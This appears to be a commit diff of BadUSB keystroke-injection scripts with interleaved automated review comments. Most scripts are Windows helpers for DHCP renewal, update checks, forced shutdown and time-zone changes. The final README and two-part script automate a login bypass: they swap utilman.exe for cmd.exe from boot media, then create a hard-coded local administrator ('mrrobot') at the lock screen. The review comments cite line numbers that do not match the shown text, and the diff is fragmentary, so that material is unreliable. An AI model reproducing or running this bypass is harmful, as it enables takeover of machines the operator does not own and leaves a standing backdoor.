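+DELAY 100
+
+REM TAB
+REM DELAY 1000
+REM TAB
+REM DELAY 1000
+
+SPACE
+
+DELAY 1000
+TAB
+SPACE
+
+DELAY 1000
+TAB
+SPACE
+
+DELAY 1000
+TAB
+SPACE
+
+DELAY 1000
+TAB
+SPACE
+
+DELAY 1000
+TAB
+SPACE
+
+DELAY 1000
+TAB
+DELAY 100
+TAB
+DELAY 1000
+ENTER
+
+REM Wait for button press to re-enable DHCP
+REM This should be run when we're at the windows Desktop
+WAIT_FOR_BUTTON_PRESS
+GUI r
+DELAY 200
+STRING cmd
+DELAY 100
+ENTER
+DELAY 1000
+STRING ipconfig /renew
+DELAY 100
+ENTER
+
+REM Wait 10 seconds for DHCP to renew before attempting to close terminal
+DELAY 10000
+STRING exit
+DELAY 100
+ENTER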
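Review bot: The account block at L4863–L4892 waits only `DELAY 500` after each ENTER, while every other page transition in this file waits 5000; if the password page is slower to appear, `<your password>` is typed into the still-visible username field and submitted as an account name — the win10 README in this commit (L3434) describes exactly that failure. Raise at least the one after the username, `DELAY 5000` in place of the `DELAY 500` at L4869. The credentials also live in cleartext on the SD card and are sent with no focus check, so the header should carry `REM SECURITY: use a throwaway password here, change it after first login, and delete this file from the SD card`. The `REM are we still defaulted to Enter->YES ? NO.` line at L4786 is a leftover debugging question; replace it with a statement of which control the two TABs at L4789–L4792 are meant to reach. The `ipconfig /renew` at L5126 runs in a cmd opened from the Run dialog, i.e. presumably unelevated; if that fails with an elevation error on the target build, `CTRL-SHIFT ENTER` at L5120 (plus handling of the UAC prompt) would be needed — verify on the target.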
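--- a/BadUSB/emptythevoid-BadUSB/windows_helpers/README.md
+++ b/BadUSB/emptythevoid-BadUSB/windows_helpers/README.md
@@ -0,0 +1 @@
+Helper BadUSB scripts for Windows.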
@ -0,0 +1,11 @@
|
||||
DELAY 500
|
||||
|
||||
GUI S
|
||||
DELAY 500
|
||||
STRING check for updates
|
||||
DELAY 1000
|
||||
ENTER
|
||||
DELAY 5000
|
||||
TAB
|
||||
TAB
|
||||
SPACE
|
@ -0,0 +1,12 @@
|
||||
DELAY 500
|
||||
|
||||
GUI S
|
||||
DELAY 500
|
||||
STRING check for updates
|
||||
DELAY 1000
|
||||
ENTER
|
||||
DELAY 5000
|
||||
TAB
|
||||
TAB
|
||||
TAB
|
||||
SPACE
|
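Review bot: This script and the one immediately before it (L5162–L5195) are identical except for the extra `TAB` at L5228, and neither carries a single `REM` saying which Windows build or Settings layout each variant targets or what the closing `SPACE` is meant to press; a user has to run both and watch where focus lands. Add a first line to each stating the intent, for example `REM Settings > Windows Update > "Check for updates" (three-TAB layout variant)` here and the matching two-TAB note in its sibling, so the difference is discoverable without diffing the files.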
@ -0,0 +1,13 @@
|
||||
DELAY 500
|
||||
GUI R
|
||||
DELAY 500
|
||||
STRING cmd
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING ipconfig /renew
|
||||
DELAY 200
|
||||
ENTER
|
||||
DELAY 5000
|
||||
STRING exit
|
||||
DELAY 200
|
||||
ENTER
|
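Review bot: `ipconfig /renew` at L5254 runs in a cmd launched from the Run dialog with a plain `ENTER` (L5248), so the prompt is presumably unelevated; on recent Windows releasing or renewing a lease from a non-administrator prompt commonly fails with a "requires elevation" error, and this script types `exit` five seconds later without the user ever seeing the result. If that is the case on the target, replace the `ENTER` at L5248 with `CTRL-SHIFT ENTER` and add a delay plus a keystroke for the UAC prompt; at minimum add `REM ipconfig /renew may need an elevated prompt - check the result before trusting this` so a silent failure is expected rather than surprising. Verify against the target build before changing it.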
@ -0,0 +1,12 @@
|
||||
DELAY 500
|
||||
GUI R
|
||||
DELAY 500
|
||||
REM STRING shutdown /s /t 0
|
||||
STRING shutdown /p
|
||||
DELAY 100
|
||||
ENTER
|
||||
|
||||
REM Handle apps preventing computer from shutting down
|
||||
DELAY 20000
|
||||
SHIFT TAB
|
||||
ENTER
|
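Review bot: `shutdown /p` at L5289 powers the machine off with no warning or save prompt, and the `SHIFT TAB` / `ENTER` pair at L5306–L5309 is there, per L5300, to push past whatever application is blocking the shutdown — which discards any unsaved work in that application. Nothing in the file says this; add a header `REM WARNING: forces power-off and dismisses the "apps are preventing shutdown" prompt - unsaved work is lost`. The commented-out `shutdown /s /t 0` at L5286 should either be deleted or get a `REM` explaining why `/p` was chosen over it.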
@ -0,0 +1,16 @@
|
||||
REM set timezone to Eastern
|
||||
DELAY 500
|
||||
GUI R
|
||||
DELAY 500
|
||||
STRING cmd
|
||||
DELAY 100
|
||||
ENTER
|
||||
DELAY 2000
|
||||
|
||||
ALTSTRING tzutil /s "Eastern Standard Time"
|
||||
ENTER
|
||||
|
||||
DELAY 300
|
||||
|
||||
ALTSTRING exit
|
||||
ENTER
|
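Review bot: This helper is the only one in the set that uses `ALTSTRING` (L5340, L5353) rather than the `STRING` every sibling uses, and nothing explains why; a reader maintaining the other scripts will not know whether to copy the pattern. Presumably it is there so the quoted time-zone name survives a non-US keyboard layout on the target — if so, say it: `REM ALTSTRING is used so the quotes and spaces are typed correctly regardless of the host keyboard layout`. The `tzutil /s` value is hard-coded to Eastern; a `REM` pointing at `tzutil /l` for other zone names would make the script reusable without guessing.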
@ -0,0 +1,8 @@
|
||||
Two scripts to perform the utilman.exe -> cmd.exe trick when using a Windows boot media.
|
||||
|
||||
Part 1 is to be used while booted from the USB media. Run it at the Install screen.
|
||||
|
||||
Part 2 is used after utilman.exe has been renamed, and is used to create a new admin account at the login screen,
|
||||
utilizing the utilman.exe switcheroo set up in Part 1.
|
||||
|
||||
Note, this trick will not work if Bitlocker is enabled.
|
@ -0,0 +1,36 @@
|
||||
REM Bypass Windows login using Windows boot media.
|
||||
REM This automates the commands used to rename the utilman.exe file to cmd.exe
|
||||
|
||||
REM Author: emptythevoid
|
||||
|
||||
REM Does not work if C: has full drive encryption enabled
|
||||
|
||||
REM Run this when you see the first install screen
|
||||
|
||||
REM == Bring up Terminal =====================
|
||||
SHIFT F10
|
||||
DELAY 1000
|
||||
|
||||
REM == Change directory to system32:
|
||||
STRING C:
|
||||
ENTER
|
||||
DELAY 100
|
||||
STRING cd c:\windows\system32\
|
||||
ENTER
|
||||
DELAY 1000
|
||||
|
||||
REM == Rename utilman.exe
|
||||
REM == By default, Windows will be on C:
|
||||
REM == Change the command below as needed
|
||||
STRING ren utilman.exe utilman2.exe
|
||||
ENTER
|
||||
DELAY 1000
|
||||
|
||||
REM == Copy the cmd.exe into utilman.exe
|
||||
STRING copy cmd.exe utilman.exe
|
||||
ENTER
|
||||
DELAY 1000
|
||||
|
||||
REM == Reboot
|
||||
STRING shutdown /r /t 0
|
||||
ENTER
|
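Review bot: The script replaces utilman.exe with cmd.exe (L5450–L5464) and reboots, but nothing in the pair restores it; until someone runs `copy /y utilman2.exe utilman.exe`, the Ease-of-Access button on the lock screen opens a privileged shell (part 2 uses it to create an administrator) for anyone with physical access, which is a standing backdoor on the target. Add to the header `REM CLEANUP: when done, boot the install media again and run "copy /y utilman2.exe utilman.exe" then "del utilman2.exe"`. The `ren` and `copy` also run blind: L5444 concedes `C:` is only the default, and if the `cd` at L5430 fails because Windows is on another letter, the commands act in whatever directory the prompt is left in. A `dir utilman.exe` before the rename, or at least `REM confirm the Windows volume letter first (diskpart, list vol)`, would make that failure visible instead of silent.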
@ -0,0 +1,56 @@
|
||||
REM Bypass Windows Login - second phase
|
||||
|
||||
REM Author: emptythevoid
|
||||
|
||||
REM change the net user username and password below as needed
|
||||
|
||||
REM Run this immediately at login. Press nothing else on the computer
|
||||
|
||||
REM try to wake the screen
|
||||
CTRL-ALT DEL
|
||||
DELAY 3000
|
||||
|
||||
GUI u
|
||||
DELAY 2000
|
||||
|
||||
REM should be at the cmd.exe now
|
||||
|
||||
REM create our new user and add them to the administrators group
|
||||
|
||||
STRING net user mrrobot password123! /add
|
||||
ENTER
|
||||
|
||||
DELAY 500
|
||||
|
||||
STRING net localgroup administrators mrrobot /add
|
||||
ENTER
|
||||
|
||||
DELAY 500
|
||||
|
||||
REM switch to new user here
|
||||
REM the other user won't immediately be visible from the user selection on the left.
|
||||
REM it *will* appear if the screen is allowed to go to sleep
|
||||
REM to force this, run tsdiscon.exe, but this doesn't work on Windows Home (the file isn't available)
|
||||
|
||||
STRING tsdiscon.exe
|
||||
ENTER
|
||||
|
||||
DELAY 500
|
||||
|
||||
REM close the terminal
|
||||
ALT F4
|
||||
|
||||
DELAY 1000
|
||||
|
||||
REM is there a way to change the last logged in user, so it's easier to automatically login as them, without having to TAB and hope for the best?
|
||||
REM https://gist.github.com/dbirks/ec4416c9064a323b14f435ee934efd71?permalink_comment_id=2370507
|
||||
|
||||
REM Optionally, go ahead and login here
|
||||
TAB
|
||||
TAB
|
||||
TAB
|
||||
ENTER
|
||||
DELAY 300
|
||||
STRING password123!
|
||||
ENTER
|
||||
|
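Review bot: `net user mrrobot password123! /add` at L5535 creates a local administrator with a hard-coded, trivially guessable password that the script types again at L5627; L5496 asks the user to change it, but the shipped values are the ones that will be run, and the account outlives the script. Strengthen the header to `REM SECURITY: change mrrobot/password123! before use and remove the account afterwards with "net user mrrobot /delete" - it is a local administrator`, and pair it with restoring utilman.exe, since part 1 leaves the lock-screen shell in place. The optional login at L5612–L5630 sends the password after three blind TABs and an ENTER, and L5601 admits the focus is a guess; if focus is not in the password box the password is typed into whatever is there, so that block should stay commented out by default or be preceded by `WAIT_FOR_BUTTON_PRESS` so the operator confirms the field before it is sent.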